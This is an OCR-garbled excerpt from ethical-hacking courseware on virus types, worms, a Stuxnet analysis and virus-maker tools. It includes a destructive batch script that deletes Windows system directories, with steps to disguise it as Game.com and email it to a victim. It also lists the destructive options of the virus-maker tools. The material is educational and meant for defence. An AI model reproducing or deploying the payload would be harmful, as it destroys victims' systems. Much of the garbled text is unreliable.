Module 07 Page 1053
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S p a r s e
I n f e c t o r V
i r u s e s
M i r
S p a r s e I n f e c t o r V iru s J Sparse infector virus infects only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range D iffic u lt t o D e t e c t J By infecting less often, such viruses try to minimize the probability of being discovered In fe c tio n P r o c e s s
Wake up on 15* o f every m onth and execute code
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
S p a rse In fe c to r V iru se s
Sparse infector viruses infect only occasionally (e.g., every tenth program executed or on particular day of the week) or only files whose lengths fall within a n a rro w range. By infecting less often, these viruses try to m in im ize the probability of being discovered.
Wake up on 15th of every month and execute code
FIGURE 7.14: Working of Sparse Infector Viruses
Module 07 Page 1054
C o m p a n io n /C a m o u f la g e V iru s e s
C E H
A Companion virus creates a companion file for each executable file the virus infects
A
Therefore, a companion virus may save itself as notepad.com and every time a user executes notepad.exe (good program), the computer will load notepad.com (virus) and infect the system
Virus infects the systemwith a file notepad.com and saves it in c:\winnt\system32directory
1
Notepad.exe
...
1 /
Notepad.com
Attacker
C o m p a n io n /C a m o u fla g e V iru se s C o m p a n io n V iru se s

4 The com panion virus stores itself by having the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified. Com panion viruses use DOS that run C O M files before the EXE files are executed. The virus installs an identical C O M file and infects the EXE files. Source: h ttp://w w w .cknow .com /vtutor/Com panion Viruses.h tm l Here is w hat happens: Suppose a com panion virus is executing on your PC and decides it is tim e to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file called P G M .C O M , containing the virus. The virus usually plants this file in the same directory as the .EXE file, but it could place it in any directory on your DOS path. If you type P G M and press Enter, DOS executes P G M .C O M instead of PGM .EXE. (In order, DOS will execute CO M , then EXE, and then BAT files of the same root name, if they are all in the same directory.) The virus executes, possibly infecting m ore files, and then loads and executes PGM.EXE. The user probably would fail to notice anything is wrong. It is easy to detect a c o m p a n io n virus just by the presence of the extra C O M file in the system.
Module 07 Page 1055
Virus infects th e system w ith a file note p a d .co m and saves It In c :\w ln n t\s y s te m 3 2 directory
V
Notepad.exe Notepad.com
Attacker
FIGURE 7.15: Working of Companion/Camouflage Viruses
Module 07 Page 1056
S h e l l V
i r u s e s
c d IthM (citifw Jl lU c k M
E H
J J
Virus code forms a shell around th e target host program 's code, making itself th e original program and host code as its sub-routine Almost all boot program viruses are shell viruses
[4U1
B e fo re I n fe c tio n
Original Program
A fte r I n fe c tio n
Virus Code----- >
Original Program
Ilf
S h e ll V iru s e s
A shell virus code form s a layer around the target host program's code that can be
com pared to an "egg shell/' making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.
B e fo re In fe c tio n
Original Program
A fte r I n fe c tio n
Virus Code
Original Program
FIGURE 7.16: Working of Shell Viruses
Module 07 Page 1057
Ethical Hacking and Countermeasures
Exam 3 12 -5 0 Certified Ethical Hacker
Viruses and Worms
F i l e
E x t e n s i o n
i r u s e s
C E H
Folder Options
F ile E x te n s io n V ir u s e s
General Search
You can apply the view (such as Detais or Icons) that you are us*1g for this folder to al folders of this type Apply to Folders
File extension viruses change the extensions of files .TXT is safe as it indicates a pure text file With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT If you have forgotten that extensions are turned off, you might think this is a text file and open it
Folder views
Advanced settings:
J This is an executable Visual Basic Script virus file and could do serious damage J Countermeasure is to turn o ff "Hide file extensions" in Windows
Fies and Folders Always show icons, never thumbnails I I Always show menus @ Display Me icon on thumbnails 0 Display He size nfoimation m folder tps Display the full path in the Mle bar Jl Hdden Mes and folders O Dont show hidden files, folders, or dnves () Show hidden files, folders, and dnves y Hide emgty dnves in the Computer folder V. Ude folder merge conflicts
Restore QfifoJls
* P P * y
u
Q Q Q
F ile E x te n s io n V iru s e s
Source: h ttp://w w w .cknow .com /vtutor/FileExtensions.htm l File extension viruses change the extensions of files .TXT is safe as it indicates a pure text file W ith extensions are turned off, if som eone sends you a file named BAD.TXT.VBS, you can only see BAD.TXT If you have forgotten that the extensions are actually turned off, you might think this is a text file and open it
This is an executable Visual Basic Script virus file that could do serious damage
The counterm easure is to turn off "H ide file extension s" in W indows, as shown in the following screenshot:
Module 07 Page 1058
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.
Folder Options
ie w S G en eral V earch F o ld e rv iew s Y o ucanap p lythev iew(su chas D etateo rIco n s)that y o uareusngforth isfo ld ertoal fo ld erso fthstype. A p p lytoF o ld e rs R eset F o ld ers A d v an cedsettngs filesandF o ld ers H IA lw a y ssh o wico n s, neverth u m b n afc ( )A lw a y ssh o wm en u s @D isp la yW eico no nthum bnais @D isp la yW esize* fo rm atio nnfo ld ertps D isp la ythehi pathntheM lebar ii H id d enW e sandfo ld ers OD o n sh o whddenW e s.fo ld ers, o rd rrv es () S h o whrfdenW e s.fo ld ers, andd n v es Vh fc d eem p tyd n vesntheC o m p u terfo ld er ttde ex ten sio n s fo r k n o w n W e types y. U defo ld erm erg ecorftcts
J c a orc faults
O K
C an cel
pp*y
FIGURE 7.17: Uncheck Hide File Extensions
Module 07 Page 1059
o n a n d I n t r u s i v e V i r u s e s E H
c d IUm (crtifw jI N M h M
A dd-O n V iru s e s
Add-on viruses append theircode to the host code without making any changes to the latter or relocate the host code to insert their own code at the beginning
Original Program Original Program Original Program
J.V M R ..
I I I I I I I I I I I I I I I I I I I I
viral code
Original Program
V iru s e s
Original Program
Copyright by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
A d d -o n a n d In tru s iv e V iru se s A d d -o n V iru se s

M o st viruses are add-on viruses. This type of virus appends its code to the beginning of the host code w ith out making any changes to the latter. Thus, the virus corrupts the startup inform ation of the host code, and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupte d is that the size of the file has increased.
A dd-on V iru se s Original Program Original Program
1 1 ^
. . .........................................................................JU M P.
FIGURE 7.18: Working of Add-on Viruses
Module 07 Page 1060
In tru s iv e V iru se s
Intrusive viruses overw rite their code either by com pletely removing the target host's program code or som etim es overwriting only part of it. Therefore, the original code is not executed properly.
Original Program
Original Program
FIGURE 7.19: Working of Intrusive Viruses
Module 07 Page 1061
T ra n s ie n t a n d T e r m in a te a n d S ta y R e s id e n t V ir u s e s E H
A
Direct Action or Transient Virus J
B a s ic I n f e c t i o n T e c h n i q u e s
Terminate and Stay Resident Virus (TSR)

Rem ains p e rm an en tly in
the controls of the host code to where

I] resides
th e m e m o ry during ff
Selects the target program to be modified and
^___
the entire work session even after the target host's program is executed and terminated; can be removed only by
T r a n s ie n t a n d T e r m in a te a n d S ta y R e s id e n t V ir u s e s T ra n s ie n t V iru se s
Transient viruses transfer all control to the host code w here they reside, select the target program to be m odified, and corrupt it.
T e r m i n a t e a n d S ta y R e s i d e n t V i r u s (T S R )
TSR viruses remain perm anently in m em ory during the entire w ork session, even after the target host program is executed and term in a ted . They can be removed only by rebooting the system.
Module 07 Page 1062
W ritin g
S im p le V iru s P r o g r a m
C E H
Send the Game.com file as an email attachment to a victim Create a batch file Game.bat with this text
0 echo o f f d e l c:\w in n t\syste m 3 2 \ * .* d e l c : \ w in n t\ * .*
Convert the Game.bat batch file to Game.com using bat2com utility
When run it deletes core files in the WINNTdirectory making Windows unusable ,
Copyright by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.
W ritin g a S im p le V iru s P r o g r a m
----For d e m o n s tra tio n purposes, a simple program that can be used to cause harm to a target system is shown here: 1. Create a batch file G am e.bat with the following text: text @echo off delete c:\winnt\system32\*.* delete c:\winnt\*.* 2. 3. 4. 5. Convert the Gam e.bat batch file to Gam e.com using the bat2com utility Assign Icon to Gam e.com using W in d o w s file properties screen Send the Gam e.com file as an email attachm ent to a victim W hen the victim runs this program, it deletes core files in the \W IN N T directory, making W in d o w s unusable The victim w ould have to reinstall W in d o w s , causing problem s to already saved files.
Module 07 Page 1063
T e r a b i t V i r u s
a k e r
. I !
^ H ^ i d Opening Copy,Move Window f l A v o i d Opening Gpedit f l Avoid Opening Media Player f l Avoid Opening Mozilla Firefox f l Avoid Opening MsConfig Avoid Opening Notepad ^ f l Avoid Opening Wordpad f l Avoid Opening Yahoo M essen ger f l Add 30 User Accounts to Windows f l Always Clean Clipboard f l Always Log Off f l Delete All Files In Desktop f l Delete All Files In My Documents * f l Delete W indows Font f l Delete W indows Screen Savers f l Disconnect From Internet f l Disable Automatic Updates f l Disable Com m and Prompt f l Disable Printer f l Disable Regedit f l Disable Screen Saver f l Disable System Restore f l Disable Task Manager f l Disable W indows Firewall f l Disable W indows Installer
f l Disable W indows Security Essentials f l Format All Hard Drives f l Funny Keyboard f l Funny Mouse f l Funny Start Button M Gradually Fill System Volum e f l Hide Desktop Icons f l Hide Taskbar f l Lock All D riv e s /o ld e rs f l M ute System Volum e f l Open/Close CD-ROM Every 10 Sec f l Play Beep Sound Every Sec f l Remove Desktop Wallpaper f l Remove Run From Start Menu f l Remove Start Button f l Remove W indows Clock f l Slow Down PC Speed f l Spread w ith Floppy , Folders f l Stop SQL Server f l Swap M ouse Buttons f l Transparent Explorer Windows f l Turn off Com puter A fter 5 Mm f l Turn Off M onitor
MDisable W indows Security Center 'MDisable W indows Them es
MHide Folder Option Menu
f l Close Internet Explorer Every 10 Sec f l Lock Internet Explorer Option Menu
fl Q I29p|G/,V U qO M Z1 -IL G M 9
lnLU COUJbCopyright by E (
T e ra B IT V iru s M a k e r
TeraBIT Virus M a k e r is a virus that is mostly detected by all antivirus softw a re w hen scanned. This virus mostly d o e sn 't harm the PC, but it can disable the antivirus that is installed on the system for a short time.
Module 07 Page 1064
TeraBn Virus M aker 3.
Avoid Opening Calculator M Avoid Opening Copy,Move Window H Avoid Opening Gpedit H Avoid Opening Media Player M Avoid Opening Mozilla Firefox M Avoid Opening MsConfig Avoid Opening Notepad H Avoid Opening Wordpad ^ Avoid Opening Yahoo Messenger M Add JO User Accounts to Windows M Always Clean Clipboard M Always Log Off | Close Internet Explorer Every 10 Sec M Delete All Files In Desktop M Delete All Files In My Documents Delete Windows Fonts 0 Delete Windows Screen Savers M Disconnect From Internet ^ Disable Automatic Updates B Disable Command Prompt | Disable Printer M Disable Regedit 0 Disable Screen Saver H Disable System Restore Q Disable Task Manager M Disable Windows Firewall Disable Windows Installer
H | Jf jf l H Jf ^
ft
J M ^ M
M | M
'/I
^ H f
Cl
jfl | 0 |
Disable Windows Security Center Disable Windows Security Essentials Disable Windows Themes Format All Hard Drives Funny Keyboard Funny Mouse Funny Start Button Gradually Fill System Volume Hide Desktop Icons Hide Folder Option Menu Hide Taskbar Lock All Drives,Folders Lock Internet Explorer Option Menu Mute System Volume Open/Close CD-ROM Every 10 Sec Play Beep Sound Every Sec Remove Desktop Wallpaper Remove Run From Start Menu Remove Start Button Remove Windows Clock Slow Down PC Speed Spread with Floppy, Folders S>P SQL Server Swap Mouse Buttons Transparent Explorer Windows Turn off Computer After 5 Min Turn Off Monitor
R u n C u s to m C o m m a n d
fake KB(s) to virus.
F ieName A fter Instal
Fie Name
exe B
j f l Run Virus with Windows
Create V irus
About E
xt
FIGURE 7.20: TeraBIT Virus Maker
Module 07 Page 1065
JP S V iru s M a k e r a n d B a tc h V iru s M a k e r
D E L m E 's
IPS ( Virus M aker 3.0 ) nfectoo ? < 0* | OVier Opbora Mtcelcnecus @ectofl Spam Local Dak PbyWnXPSono Net Send Spam |
\
Change User Psnod| Open1 304c Dak T1a | SpaaParter |
1 Swap U w Bjlons | Spain Wh MtgBcx Reset Tne *deUw*F#e
Cor*w Fie Ben9na| Hi*. \M. P t |
BUe Screen Of Oeih | W de Docunerts Folder C**e # Doc | DefctoAJ TxlRto
Delete H Ptf flea \ M M N H>4Fh 1 DeW** l/*-*e* | Cra#1 CcnpJlef |
[Met Ail Xml Ffat | Delete M .Mp3 F* CeMe Al Phg File* | The La* Restart 1 Delete M bee Fie* DeMetWdl Delete M y Munc
Delete My Documents 1
DcMeMyPcaun |
ft*, Frtocaion To D*** Mg M) |dl 1 Dal ! | \vd Delete | |*-l CMet* | | "fl OaWe Notepad D M tP m | | Delete E m* Defcto lfj< plow Delate | [Mate | Delate | Dalai Wo-d DaMe Outtoax 0**eSrf | \ |
0 FV to< O LooO ff
Vr*5 A'lrr Ir^HI I
0 TurnO ff
OH ibiinofco
0 N oe
De*rt Cakutakx Delete Acctm
Server Name.
wfiggyfeoy com
w & co m |
9 0 0
JPS Virus Maker
DELmE's Batch Virus Maker

Copyright @ by E lr C lM K i. All Rights Reserved. Reproduction is Strictly Prohibited.
J P S V ir u s M a k e r a n d D E L m E 's B a t c h V i r u s M a k e r JPS V iru s M a k e r

JPS Virus M a k e r is a tool to create viruses. It also has a feature to conve rt a virus into a w orm and can be used to disable the normal hardware of the system.
Module 07 Page 1066
3PS ( Virus M a ke r 3.0 )
Disable fie^stry Disable MsCortig Disable Tat* Manager Disable Yahoo Disable Meda Paêr Disable Internet Explore! Disable Tme Disable Gkx >Pokey Disable Wndows Explore* Disable Norton Anb Vius Disable McAfee Anb Vius Disable Note Pad Disable W ad Pad Disable Wndows Disable DHCP dent Disable Taskbai Disable Start Button Disable MSN Messengei Disable CMD Disable Secirty Center Disable System Restore Disable Control Panel Disable Desktop Icons Disable Saeen Save* O Log OH
R u n d i3 ;
H rie S ervK et
Q O
Hide Outlook Expreu HJe Wndows Clock Hide Desktop Icon* HideAIPioccess n Taskmgi Hide A l Tasks n Taskmgi Hide Rm Change Explorer Caption Cleat Wndows XP Swap Mouse Batons Remove Foldet Options Lock Mouse & Keyboard Mute Sound Always CDflOM TunOKMontoi Ctajy Mouse Destroy askbat Destroy OINnes (VMessengetl Destroy Protected Stiotage Destroy Audo Service Destroy Clpboatd TemwMte Wndows Hide Cutot Auto Startup O Htmnate O None
O Restart
O Tun OH
Name After Instal:
Server Name: Sender.exe
JPS V t n u M a k e r 3 0
FIGURE 7.21: JPS Viruse Maker Screenshot
D E L m E 's B a t c h V ir u s M a k e r (/A
1 DELmE's Batch Virus M a k e r is a simple tool that allows you to create your own choice
of bat file viruses to suit your tasks.
^LJxj O a n g U a a rP m * w o r dT o q w o r ty
I uaar *ujeememe" . Qwwfy w* Crah Corrpa cho dart - V O x ra tftM cho dart %0>>cnMhbd cho dart \0 >xra d> bd cho Kart *\ Q aw *\bm cho Hart 0.' >K n + b m cho dart 0. ' >>craahbd cho dart % 0>xya^bd cho dart ~ X0crd3bd cho dart %0>>crad3bd cho dart '.0>>crahbd cho dart %0 a d ) bd cho dart ' .O xcra dib d cho dart cr a# bd cho dart %0 a s * bd cho dart a a bd cho dart %0>x7ad1bd cho dart X0>x7a*1 bd cho dart 0.* > x7a#1bd dart craihbai S w p Maua Buaona | Oange Uwr Paa o>d | Sp VWh MagBo a | OpfvO oe Itw f |
H d S a r*
H frV h a W a
| CaHuafibE*ncna| Vkj* Ud P* I
B m S d M n O ID i* I N d Doajnarts FoUar I
Oa>a H OocFtea
0 * * H Td Hm
Oa*da H Ptf FIaa DcMe M *>4Fm O tfc a * LrfcF | | |
C M H * O Fte I 0 * P h g f tw The Lad Rx i | | DM H f a t f t w Od d Hal & O M nM yH udc |
% 0 1 % 0 * 1
| Crd> Computar | Pa% Plcfcw
O d d * % O o cu-rt | 0 4 4 F ia t**
N o tF ieE je c n a o nT o O d e tele g ,b O r^r
0 d a rt "% 0 * Jy d 0 v % \A U T 0 6 X E C * A T
* lym tm w i |
p u g g J b o T
y * D 900^*co*H
M W b 0 yco w
Chang H o w Pag Qpan Wab Pg
FIGURE 7.22: DELmE's Batch Virus Maker Screenshot
Module 07 Page 1067
o d u l e
F l o w
C E H
V ir u s a n d W o rm s C o n c e p ts
T ypes of V iru s e s
I
C o u n te r m e a su re s M a lw a r e A n a ly s is
M o d u le F lo w
Prior to this, we have discussed various types of viruses. N ow we will discuss c om pute r w orm s and how they are different from viruses.
Virus and W o rm s Concept
M a lw a r e Analysis
Types o f Viruses
Counterm ea sure s
< 4 /
V
P e n e tratio n Testing
This section describes worms, w orm analysis (Stuxnet), and a w orm m aker (Internet W o rm M a k e r Thing).
Module 07 Page 1068
o m
p u t e r
o r m
C E H
Computer worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction
Most of the worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system
Attackers use worm payload to install backdoors in infected computers, which turns them into zombies and creates botnet; these botnets can be used to carry further cyber attacks
0
Com pu ter w orm s are m alicious program s that replicate, execute, and spread across netw ork connections inde pen dently, w ith o u t human interaction. M o st w orm s are created only to replicate and spread across a network, consuming available com puting resources; however, some w orm s carry a payload to dam age the host system. A w orm does not require a host to replicate, although in some cases one may argue that a w orm 's host is the m achine it has infected. W o rm s are a subtype of viruses. W o rm s were considered mainly a m ain fram e problem , but after most of the w orld's systems were in terconn ected, w orm s w ere targeted against the W in d o w s operating system, and were sent through email, IRC, and other netw ork functions. Attackers use w orm payloads to install backdoors in infected computers, which turns them into zo m bies and creates botnet; these botnets can be used to carry out further cyber-attacks.
Module 07 Page 1069
H o w
I s
a W
o r m
D if f e r e n t f r o m
a V ir u s ?
Replicates on its own

A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs A worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically but a virus does not
Spreads through the Infected Network 4 \
H o w Is a W o rm D iffe re n t fro m
a V iru s?
Virus A virus is a file that cannot be spread to other com puters unless an infected file is replicated and actually sent to the other computer, whereas a w orm does just the opposite. Files such as .com, .exe, or .sys, or a com bination of them are corrupted once the virus runs on the system. Viruses are a lot harder to get off an infected machine. Their spreading options are much less than that of a w orm because viruses only infect files on the machine.
TABLE 7.1: Difference between Virus and Worms
W o rm A worm, after being installed on a system, can replicate itself and spread by using IRC, Outlook, or other applicable mailing programs. A w orm typically does not m odify any stored programs.
As com pared to a virus, a w orm can be easily rem oved from the system. They have m ore spreading options than a virus.
Module 07 Page 1070
o r m
n a l y s i s :
S t u x n e t 0
0
0
Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power plant The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out o f their specified boundaries
Stuxnet contains many features such as:
1 2
S elf-re plicate s throu g h rem ovable d rive s e x p lo itin g a v u ln e ra b ility a llo w in g a uto -e xecu tion Updates its e lf throu g h a peer-to-peer mechanism w ith in a LAN
Spreads in a LAN throu g h a v u ln e ra b ility in th e W in d o w s P rint S pooler
E xploits a to ta l o f fo u r unpatched M icro so ft vu ln e ra b ilitie s
Spreads throu g h SMB by e x p lo itin g th e M icroso ft W ind ow s S erver Service RPC H andling Rem ote Code Execution V u ln e ra b ility Copies and executes its e lf on re m o te com puters throu g h n e tw o rk shares ru n n in g a WinCC database server Copies its e lf in to Step 7 p rojects in such a w ay th a t it a uto m a tica lly executes w h en th e Step 7 p ro je ct is loaded 8
Contacts a com m and and co n tro l se rver th a t a llo w s th e hacker to d o w n lo a d and execute code, in clu din g updated versions
Contains a W in d o w s ro o tk it th a t hide its b inaries and a tte m p ts to bypass security products
10
Fingerprints a specific in du stria l co n tro l system and m o d ifie s code on th e Siem ens PLCs to p o te n tia lly sabotage th e system h ttp ://w w w .s y m a n te c .c o m
C opyright by EC-Cauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited.
W o rm A n a ly s is : S tu x n e t
Source: http://w w w .svm antec.com Stuxnet is a com plex thre a t and m a lw a re with diverse m odules and functionalities. This is mostly used to grab the control and reprogram industrial control system s (ICS) by modifying code on pro g ra m m a b le logic controllers (PLCs), which create a way for the attacker to intrude into the com plete system and launch an attack by making changes in the code and take un a uthorize d control on the systems w ithou t the knowledge of the operators. Stuxnet contains many features such as: e Self-replicates through execution Q Q Spreads in a LAN through a vulnerability in the W in d o w s Print Spooler Spreads through S M B by exploiting the M icrosoft W in d o w s Server Service RPC Handling Remote Code Execution Vulnerability Copies and executes itself on rem ote com puters through netw ork shares running a W in CC database server rem ovable drives exploiting a vulnerability allowing auto-
Module 07 Page 1071
Ethical Hacking and Countermeasures Copyright by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
Copies itself into Step 7 projects in such a way that it a u to m a tica lly executes w hen the Step 7 project is loaded
0 0 0
Updates itself through a peer-to-peer mechanism within a LAN Exploits a total of four unpatched M ic r o s o ft v u ln era bilities Contacts a com m and and control server that allows the hacker to dow nload and execute code, including updated versions
Contains a W in d o w s ro o tk it that hide its binaries and attem pts to bypass security products
Fingerprints a specific industrial control system and m odifies code on the Siemens PLCs to potentially sabotage the system
Module 07 Page 1072
o r m
n a l y s i s :
S t u x n e t (C ontd)
C E H
When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export Stuxnet hook Ntdll.dll to monitor for d B *! requests to load specially crafted file < names; these specially crafted filenames are mapped to another location instead - a location specified by W32.Stuxnet
Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks The dropper component ofStuxnet is a wrapper program that contains all of the above components stored inside itself in a section name "stub" When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports
It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls
W lH k tiH W
h ttp ://w w w .s y m a n te c .c o m
Copyright by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited.
W o r m A n a l y s i s : S t u x n e t ( C o n t d )
Source: http://ww w.sym antec.com Stuxnet consists of a large .dll file that contains many different exports and resources and tw o encrypted configuration blocks. It hooks Ntdll.dll to m on itor for requests to load specially crafted filenames; these specially crafted filenam es are mapped to a nother location instead, a location specified by W32.Stuxnet. The dro pper co m p o n en t of Stuxnet is a w ra p p e r program that contains all com po nents stored inside itself in a section name "stub." W he n the threat is executed, the w ra ppe r extracts the .dll file from the stub section, maps it into m e m ory as a module, and calls one of the exports. W h e n e v e r an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. W hen injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special m ethod designed to bypass behavior blocking and host intrusion-protection based technologies that m onitor Load Library calls.
Module 07 Page 1073
o r m
n a l y s i s :
S t u x n e t (C ontd)
In je c t in S te p 7 & call e x p o r t 3 2
c d [U*4 H (crtifw a k M
Infects Step 7 projects
E H
Check CFG
Infects removable drives
In je c t in s erv ice , call e x p o r t 3 2 ................
A .................
I n f e c tio n R o u tin e F lo w
Hides malicious files
C re a te global m u te x e s
------ *-----C re a te ro o tk it s erv ice reg keys In je c t in S te p 7 & call e x p o r t 3 2
S et file tim e s * C re a te global m u te x D e cry pt resource 201 C r e a t e .p n f & cfe files & 242 & w r ite to disk V -------------------* ------------------Version OK D e cry pt & load self D a t e < 0 6 / 2 4 /2 0 1 2 fro m disk. Call e xp o rt C om pare ru nning version n u m b e r and version on disk
Exit
R o o tk it files > 1
M rx d s .s y s
M rx cls .sy s
6-
g e t version
h ttp ://w w w .s y m a n te c .c o m Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
W o r m A n a l y s i s : S t u x n e t ( C o n t d )
Source: http://w w w .svm antec.com
In fe c tio n R o u tin e F lo w
Stuxnet checks if it has adm inistrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take w h atever actions it likes on the computer. If it does not have Adm inistrato r rights, it executes one of the tw o zero-day escalation of privilege attacks described in the follow ing diagram. If the process already has the rights it requires, it proceeds to prepare to call export 16 in the main .dll file. It calls export 16 by using the injection techniques described in the Injection Technique section. W he n the process does not have adm inistrator rights on the system, it tries to attain these privileges by using one of tw o zero-day escalation of privilege attacks. The attack vector used is based on the operating system of the com prom ised computer. If the operating system is W in d o w s Vista, W in d o w s 7, or W in d o w s Server 2008 R2, the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating system is W indow s XP, the currently undisclosed win32k.sys escalation of privilege vulnerability is exploited.
Module 07 Page 1074

Viruses and Worms
If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with adm inistrator rights in the case of the Task Scheduler vulnerability. The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the Win32k.sys Vulnerability and the Task Scheduler vulnerability currently are not released as patches are not yet available. After export 15 com pletes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version n um ber of the com prom ised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect rem ovable drives; injects itself into the Step7 process to infect all Step 7 projects; sets up the global mutexes that are used to com m unicate between different components; and connects to the RPC server. Export 16 first checks that the configuration data is valid, after that it checks the value "N T V D M TRACE" in the follow ing registry key: H K E Y _ L O C A L _ M A C H IN E \ S O F T W A R E \M ic ro s o ft\W in d o w s \ C u rre n tV e rs io n \ M S -D O S Emulation
( C o n t d)
Error
>
Equal
Check CFG
Inject in service, call export 32
Inject in Step 7 & call export 32
A......... < r~
< -----Reg key NTVDM Trace=19790529 Create global mutexes
Infects Step 7 projects
Past deadline
Date<06/24/2012
^ Date OK
Check OS
XP or less Vista or higher
: : : y Set SACL
Hides malicious files
Create rootkit service reg keys
Inject in Step 7 & call export 32
V Set DACL V
V Set file times Exit
......... --------------A
Create global mutex
V Create.pnf &
.cfg files
j. File OK
r>
Oem7a.pnf
Decrypt resource 201 & 242 & w rite to disk
Rootkit files
Date<06/24/2012
Decrypt & load self from disk. Call export 6 - get version
Compare running version numberand version on disk
FIGURE 7.23: Infection routine Flow
Module 07 Page 1075
W o rm
M a k e r: In te rn e t W o rm C E H
M a k e r T h in g
Internet Worm Maker Thing Version 4.00: Public Edition
IWTFRNFT WORM MAKFR THING V4

Poyloods: C Activate Payload; On Date
fC le n je ltv o sse
00 MM V Y
I D ra fc l:W ta fc rn sS earity
O R I- Dsabfe 51 0ez-rny C Random lyActivate =a>oads Chance of actovaTro p3/03d3: 1IN | W InduSe [C] Notce CHA NCE V r r I Dsobfc M5co Scanty DtditRuiCannd Dsabte Sh_:d:vwn Dssbte L 030
f~ Ccte Systen Restore r Charge 20 Text
I -B lu eS c re e nO f
tnfectton O ptions:
I -U T sa lto 'W S r p r B o w ic
I- DkW ; WnfcMIWeb
r *Search Comard r 5 rux B norc
te
I- Loop S ound r HdeDedctop 1- DsaMe M alw are Rem ove 1- 3eatfe windows He FVatecton n Compt Antivirus r Change Com puter
In fe ctB a tF ies
f~ Infect 'AsHes I- Wect Voc Rfcs Extras: r Hide W rusfiles
r HdrAIOnves r Bsabte Task M anager P Osobt Keybord
O u tp u tP a th :
r Com pleTo E X E Support Screadlrg Options Startup:
r Disable Mduss P Me3sogeBox Title:
1 CptrWaw
UR L:
r
r r r
Global Regtby Star tup Locoi Rccofrv Start
-0
Icon:
f ~C hangF E T ilrB ar'

Text f~ Change VYr MeAa *toyer Txt
M.te50e*rt
n
Patv
*
* 1 *
r Chonge Cn/e Icon CU.EXZ.KO: |c:\>vrdow:YJ01 |1 If You Ifced Tho Program Pietwe
Wntogon Shell M ock Start A# Servce
r b'glA'tjrt1 4 >
German Startup
rD o o U lcK c s c c K
f OK^r PxptarM.x r C raw Reo O w ner Owner:
T el:
r W ctroP flider
I -------P C hancev/alpjpc
Add To Context M enu 1 r
T w it( M a * 0 0 1 f lf ) i
Chan? Cod* Teat
M tp ://x < u lra m^hr!nu1.:0 1

If You Kron Ai^lHrq About V05 Ptcurainrirc tt-lp 5uw11 Tills
/isI -
r S o a ^S tam p
r *end! Startup I Italan Stortjp
f OoenCdOrtves L O C fcW0*tSltQn P Do*toad file H3 >| U R L:
I------------------r ! rm ?_ J
l~ Keyboard DIko P Add To favorites
AafcOrllU: r
crj m o *u *
P |c rr<IB yM a k n gA P bgn(S p R * d m ).itw * C o n tro lP tw l
I-------------------r Charge Reg 0g9nsabon Organisation:
r Ooncer* P Execute DoWaaifed
C opyright by E&Cauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited.
W o rm
M a k e r: In te rn e t W o rm
M a k e r T h in g
Internet W o rm M a k e r Thing is a tool specifically designed for generating a worm. These generated Internet w orm s try to spread over networks that are basically preset invasion proxy attacks that target the host technically, poison it, and make a base and plans to launch the attack in future. The w orm s work independently. An Internet w orm sends copies of itself via vulnerable com puters on the Internet.
Module 07 Page 1076
Internet W orm M aker Thing Vernon 4.00:Public Edition

INTERNET WORM MAKER THING V4
r ^
dw
CfcMWf -nrdiii i S w i h f
- Owng N 0 0 Tt
1 1 r r * * Y IS o a J
I ---------r la pSLrt
B O m
'
A*vMadau<(ue
rR xS O M norou! r **K tlM N n

r S r*K trt rt o
Om M Norton Saa**y
jw + tM **1r ta n Scr** o d r Q
ng*
F
rW hcttor*
EM UM
ff
InlA H NMa Oueut*a: r Cw^Te*sDB1
r not M in e C C u k iU r t
r om aetF rfil ' I

r C0n * Anbvui
r i * inr
r CualooiCadt
p Chr91C M P w l1>
r a 1M 1K g 1 s r 1a c j1iu 9u .11
r *H g gvM H
r K*kwlx rD am aF te r M>aa.* -
Change O ft* loan

to *
D l l E1E. ICO.
( E wMM*oi ( 5
r
r
r MrlMttraa
M d H C a ra n rlM n
C W y Ctoo [ . !
fou L*cdTho
T ft**S to rk
r fimwiUart
rm ^ u ld w i) .
PfO b
V t|fQA tX f c if
* B g ttt t H a unq A PViQ r P
rS p an *S to rk
r Nndtnvks
r t d w s jr&
* < < >Jtt.

r C R iN a r a r
r r
r
^ _
Urrto*Dea
Add To F * n te
te n rid W im
rO trn g tT m m
